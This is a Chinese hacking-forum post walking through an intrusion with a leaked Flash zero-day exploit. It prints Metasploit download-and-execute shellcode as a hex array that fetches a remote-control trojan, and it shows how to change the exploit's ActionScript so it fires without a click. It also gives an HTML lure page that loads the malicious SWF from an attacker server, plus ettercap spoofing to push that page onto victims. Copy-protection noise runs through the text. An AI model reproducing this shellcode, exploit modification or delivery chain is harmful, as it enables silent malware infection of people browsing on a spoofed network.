找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1564|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

$ X! y$ ~* n8 K0 z& [ 三、flash 0day之手工代码修改制作下载者实例入侵演示 ) J% t8 o$ S5 v9 m$ e5 |7 g

5 z$ Y0 }; @* A: p$ a6 |

% D( ~ N% |) A: A/ H 利用到的工具: 7 k; ~ E/ W- B4 H9 ~: B

" N$ y4 W/ o* u, ]; s

6 I: {5 Z8 k; {4 t Msf 2 Q$ s7 Z& d i7 ~5 q

$ i' ~9 }, @, u# g' B; l

5 e% W) H8 s$ t Ettercap % Y& [/ m$ r' z% \& S

) T8 ^/ ] u% n8 z1 y$ z/ i) P

T: J$ G& a$ w Adobe Flash CS6 / g# A" s/ a: A5 y$ B

" [5 }1 Z6 n" E4 G1 g6 O

& C _, V% c5 O, ]2 a, |4 Y3 _ Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 4 [, v# X! x8 d# n: Q7 g$ U8 R' `

; L2 [. V6 x; _( X/ m0 ^

: O$ j, v% s/ Z6 V; x 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options , X1 B! Y1 ]4 W- Z( y- a

4 }" H. q# o) C0 l8 _

) @3 T6 c+ ?9 T/ T, |9 B' b 如图: 8 w/ }& B( p X' _% j" K8 v

* E7 m1 y8 ?* @+ @" K$ x

/ q! D |6 E& M; J" z   # }* T1 Z2 B5 Y2 s5 f7 R

- K$ g" A& f- ?$ {- r E

! D$ f$ L, [3 i$ ^1 b: v7 T4 }- @   / B7 {8 u! e/ J& b8 `# m

" R! S9 Y4 I/ Z3 P

. b. A7 p! _* L0 X0 X( W1 c$ a 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: , ~ ~+ M8 w; C, U0 s

2 ]& M5 K& S. ]- ~2 T5 q i( X8 d4 `

7 S8 l9 R) u9 J" n+ T% C, A! g   1 H( u4 a+ `0 \: f1 @

! d# \3 [! T6 r1 {

7 o. Z/ X& i8 _' {/ o( R   ; w9 p. `. }7 u' L/ z" e

, T+ b% S6 l3 f, v0 H$ F

% S( F3 y7 _ I 然后执行generate -t dword生成shellcode,如下: ' Y% x `, n& d

* N- ^$ ^ ]. ^2 f6 C1 ?6 y

5 D( C; N6 @- ^ I, F   & c" E1 |2 U- V; r5 f

9 k+ |8 q9 U r

- ], g; ]2 x$ z2 e& n; l' J 复制代码到文本下便于我们一会编辑flash exp,如下: 4 s/ u2 H! k2 {; K1 j7 w4 n6 Y

4 |7 s* w& S4 M# V- R

; f: i' y3 s! Y7 n3 K 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 0 o4 X" v' |5 v5 d# ]$ h1 k! l. B! h

; P6 i0 Z+ m" C; `& t# g, _

- `$ S, B5 \& r' H. u3 c$ i 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 1 |( C, \/ T* m& }; f( B

7 |$ H* D2 Q: ~8 c. X6 R

/ _' z5 a5 X3 D% | 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ; c1 f; r0 U' g& z. v9 g+ Q7 ?

0 B* S' \" r" y- g

. i$ o/ ^8 j3 O0 w( ~5 ]3 y 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 5 `: N2 c/ z; w# {5 Q& u

. S( d( B& ^& N' A

/ L s1 k. J: \- u u7 | 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, : M) R: k" J: V" \! b" F

6 E) }7 M9 L* i8 m+ g" z" y

2 G6 i; e2 Y4 }% v6 b 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, , d5 V e) E7 R0 L

( G% m. B9 R# r3 L5 F M

/ g+ G k# `$ a 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 1 [3 ]( \. H& c- `0 b; p, H

3 I+ b8 _9 T! \1 J( H3 s: a1 C

) @( Z$ `+ t- { 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ; R; g1 `# E4 ~, _7 p! y5 G

( L0 V! x3 {0 w5 y u' [# a. I

) ~# B; L: D& M7 L4 W7 c" d E- K 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, + a. q7 T* ]6 o R) m& z" d

- c* V2 B6 Q( E

& Y; G% {2 N: h5 z3 [/ H 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ' b; V1 A0 |% U4 E: l# w% M8 r3 a, q; r

2 }# N' `3 [1 }% [2 G

% n# V% [% t" \( R% n" i 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ' O; o) ]2 w9 A! D3 ^; ^

0 t& h* S9 j0 c0 B# K( g" C( U

# K+ m4 U5 t! k+ v* h: a! C% D 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ( F* u1 b% Y* K+ D

5 l7 k6 T* m( w( c; |

* s9 }: ]. r" S5 [) r 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, ( u$ O9 c" w5 R7 }/ ?# b7 K) e

( g9 a, l: B- n1 g$ A( O6 Q

7 V+ D) D& O: D( T) ~* m6 d 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 8 U6 A) o) m5 S: ~6 d

. [9 Y( d4 ], L/ u

1 G( A( F& s7 p   ' D$ ?; X+ b! x) f1 M! L

# r' Z! |6 ~) ^5 G$ g6 ^+ H

; o2 R) ~* x+ [4 }9 O8 E$ q1 k o   # c6 |/ N4 y: a2 x" G

7 D- c2 M0 `: P* H) ]

: ?5 b" i- l0 F2 F0 H" H 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 2 n! `% d3 q7 h- M5 y

- `$ E7 S8 o2 _; [; M

9 c2 b4 Q+ K, e   6 N2 n3 C+ y4 a% g, w

$ K8 a. T; t& J- C4 c" e$ W" q

- {+ |: w L" c9 K! a 先修改ShellWin32.as,部分源代码如图: v. d# N+ N: U. M6 E

2 i, m: U1 \* I# N1 Y

& A4 r! N3 o/ r8 X) B% D; Y& h   4 t7 m$ h; W) V3 N/ l

+ c9 g7 Q0 o* f5 H5 I5 }; g) z

. C; @* j/ x7 v 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 4 E5 B. i( k! E. m/ M n8 d

' ~* D1 z6 e B& ^ C

) S5 r6 `5 d. O+ k2 d   : Y' }6 R% j _! | P7 i- p/ U5 ^

2 \: V& {; A3 b* Y

- B7 X5 D- T( W1 n5 K, ?8 u; l2 _. I 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ! @7 Q. o& i2 }

: T! f# j+ z$ D3 a& `& P

' Y1 B% T+ p, A- J! E2 ~   6 o9 @* ~2 l! G% H z" M

5 {1 o% g/ y* a1 v* |; `- s

4 U- i( w2 T8 L0 M% p' R 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: % V: ]$ E, o* [

3 b! j: T" U: [2 Z* n

6 I" c8 n- g7 O1 i5 J   * {, C( x6 o5 ~5 O' ?. u

}" j$ ~5 e5 G( ]3 [

; {% f7 }% H" P4 X+ @# f' a   + f4 ~0 J$ z. @$ Z1 b* C, B

4 {) |" o9 y0 t9 o7 d, q2 Q! q

/ k9 y& \/ }2 L# A( u8 ]+ n   2 V% C* w* F# q2 M, E: r4 y C

1 K, N4 r2 u4 @6 h& h& G# n

- K d3 }6 ~% T1 R& @: ~8 T 然后点保存,下面我们来编译一下,打开 7 \/ z* u; J0 N8 S) i

& _. Y0 ?& V) X* o! T

4 d, J/ N. R6 l! k7 J exp1.fla然后点文件-发布,看看编译没错误 3 _& q( }/ J& c% w) j- z; w- ?; Z

6 Q3 J; W& ]9 I5 F9 C& c" W

2 L8 c' r8 }8 Y/ }5 D p# k) z   1 g8 } Y7 S& M2 g( x. S1 Q

# a Z2 N% L3 c. B' K

3 G; l, s- i( h Z   6 ]% u9 c. w0 e, E4 _

; _* U+ P7 j$ }, {# v

/ N" D! P) b }1 e2 Q- E: x   , {" d; P" T5 q$ r* Y$ S. E

- |5 [% |. R( `! e- ]( f. Q

5 C' k: x5 m1 H! k/ }) V K   / w3 t! G0 S9 k2 z: n, _

% `: w; u* v4 @. z

" a! j8 P' z+ w; v' W$ q! L, k 然后我们把生成的 5 o, u9 R4 W& m: C- u3 ]+ v

0 S/ k& e3 n: T) M( @9 ]

! S' T+ _1 v- G/ W exp1.swf丢到kailinux /var/www/html下: ( Z. Q0 B1 C; j! d2 z

5 l9 J$ p1 X0 d/ \: |6 y

+ g" J7 t4 |) E* ]& D+ h 然后把这段代码好好编辑一下 - |, h! f- }# l% Z# q4 a; w

/ ^; ]- c2 h8 W

" I' y1 I8 ~) k2 G   ( `6 r0 h7 p5 D# E' y5 b

; ~. A! |! G. X- ]; ^4 E4 A" ^6 o+ x

, V: i I4 i8 l D" d" a   4 Z4 Y, m$ W4 D+ @8 J/ `

) L& k* J" d& c3 j$ x1 @" F/ _

4 O+ z8 W1 l' k7 r7 L5 `   ( u/ z2 Z q& R

5 V# |7 o( t2 {# J1 ~ C( M/ G

8 x3 Q! I' Z- C7 [! d   \2 v- M: w1 m8 U! H

, J( M; o3 r# `* p4 J' E

+ F5 c: t$ ?/ p   + _% B2 I* O) [- O- m" O: t% ~0 F

2 n( m$ J& }% y1 n

. |( x2 M! C0 g6 D   4 |1 A, ~& ]' m1 ~

2 f, t: a& s7 y5 B

2 S& o* ^+ B' K) E4 W9 X" [1 l! } <!DOCTYPE html> 2 Z" D5 c0 Q8 U5 g: ]9 t

. d1 \" s* P- `, B2 B

) _: i( ^) [# O G8 ~. x <html> 2 l, T0 a& V' Y4 e

. }! t2 w: W B

9 x9 V9 M; H( G+ L' n <head> * W' X, o# V6 E7 R1 y

) g) B" Y/ D7 W7 h8 n

: D$ G7 I. p! d( f+ c8 K9 } h* { <meta http-equiv="Content-Type" content="text/html; 0 m4 y5 [+ \( F. D5 P8 }2 i

; v9 I0 W7 v( N: Q( T. c5 K

* |: `. ]+ `% H+ M charset=utf-8"/> , K3 X2 s0 ?% E. w8 c d0 [

( z! g1 g; ]* l8 J! v

4 C" p/ t4 I& p" j" c </head> 4 O$ L( ?' o# h- @

8 `! I& r* a- l( c# J

& ^! ?$ O8 J1 B" u2 V% O! u" W3 g <body> 1 j% V- q% L7 j' e/ z

B9 ~ w4 t) A* y; L) o5 w

" k1 ^/ N+ j5 D/ X& p4 L <h2> Please wait, the requested page is loading...</h2> ' e, r% I% X6 |

+ ^! ?9 A. @: }1 Q4 p5 Q$ M

4 ], q6 C! Y7 M( k/ M1 P: Q; \ <br> 9 O. J9 M# p$ }# G8 B

/ G8 _3 \" o+ @8 m2 c' I! \1 d) q8 E

5 G1 t0 y3 N4 j0 s9 p <OBJECT 2 B, e" t! _+ v2 R8 T

+ o: d" L7 N, |, q2 g

+ z2 D* T1 A7 I/ m classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie ; F# }0 f: K- u8 ~

2 \- {2 |7 A" g, S. I

, B1 o+ @% `1 Q5 s3 z6 O! q2 N9 v: w! ^ VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ' \& M( u: p0 _! C4 v+ d$ G

4 @7 ^0 ?: L0 [" Y

# U3 l5 q$ }0 H6 e' i3 |9 p4 o </body> ( p; P: o1 U# m2 s( ^* T8 i

. g% I- ]2 _$ H* G5 k9 j$ o% b$ j& ]: t, ^

3 z" T0 z* b5 C8 J7 Z3 Z <script> # }0 k, e* X: B0 Q1 [

+ F3 i) H% l9 J

. D/ {! d f: u8 j& j. e     setTimeout(function () { , ^, b9 M% u0 O% M Q

" q3 w1 ?5 d! B7 u7 e5 e% O

2 y; p) y: P& ?( a( S( x J# A4 |          : D/ [3 {5 U/ n9 j7 K# O4 }

8 E2 v9 {- ?2 Z. m

/ p7 B7 X* P. j; P6 n& e window.location.reload(); ; l5 C. O0 ~" W) g' S

* W3 }% N3 ]! L5 [% M

. E3 [( k3 g& [+ [' Y% ~     }, 10000); 1 d1 n1 K Q: K8 }4 }

7 i. P2 O) v2 u r5 D

+ P8 {, x* r% Y7 R   7 x$ Z) v% K5 D) ]/ x y

6 W( h3 Q5 }( j; Z: R+ p8 m1 s

9 v2 y. [7 z C) d# K l1 Q; |( J </script> & i8 C8 b* I. P+ r

* a6 v" Q l" I& r) J R' d

* q1 }; x) K0 Y T* p4 M" I; V% a </html> + ^7 j' _: G0 J$ o# `1 z' G

3 i0 a& e" s- ~! O8 y% o

$ R( `# ` K( s8 L$ p   3 S0 A9 Y0 R1 \- {5 |( \

. v0 B/ b2 v6 f+ x& H

6 J8 h) _4 q( X" p3 D) z0 D, q 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 7 q0 ]* @3 k& L8 u

( Z3 p1 Y/ p. i& o0 b( y

0 R, w$ h b4 B4 F6 S   - B4 C4 `3 N! F$ q( Q

' v4 d/ m3 Z1 [) B

& `; |8 |4 ]: ~   Q" A J, T- p7 {

4 V7 l& d5 q5 v! z8 O( Y

/ @6 e e, E+ D7 n   ; B- _# Z. ^9 E S U6 }

3 O* {% e+ P4 W: ]

+ s4 ?# H1 i: a% y   8 a0 F: e8 z+ ?! s

5 v5 ~3 F/ |9 D8 g

0 g7 H9 J( p! \8 m/ L   : ~7 B& k) G# F* p' P

* V& X$ I. b+ F9 L' D p

' P) B- a5 i3 Q0 z) Z 下面我们用ettercap欺骗如图: 0 r" o& |2 g, t6 Q* g

4 e. w6 c$ }( y. @. ^7 d

- [4 n+ Q' Q' k/ Z) ?$ c) l   `! ^3 P" Q" ~' X \3 e

6 x5 j/ z8 b# w

2 ?+ w+ ]' f$ R0 C2 }   & Y$ J; r: @# x6 P; G

' R! e6 `0 ^' t+ D( M e1 k

" b5 B5 D% j- G1 Y$ z9 \/ @ 下面我们随便访问个网站看看: 3 f* N" _, i3 T4 t4 z% j2 V

& A, R9 _$ f' }& ^ Y! W- z4 C

- J4 p% s+ g5 y) q2 p) p 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 5 \$ f1 s" H! i8 T ]

2 p; J- B: ?; y

$ W, w+ J7 \1 _- ~$ g" Q   ' X4 V- n7 g* I1 ~4 A* _

- Q. S R* Y* \* _. l/ [" U/ Z4 r

% I7 O0 I: n4 ~# k0 A 我们看另一台, 0 o3 o* V1 W" M: I

6 @ _2 [6 S- p5 P( R6 P

( g: B; J7 x' t6 ~ 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 0 Q7 t7 @) U, M. S1 y+ \' P7 e7 b

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表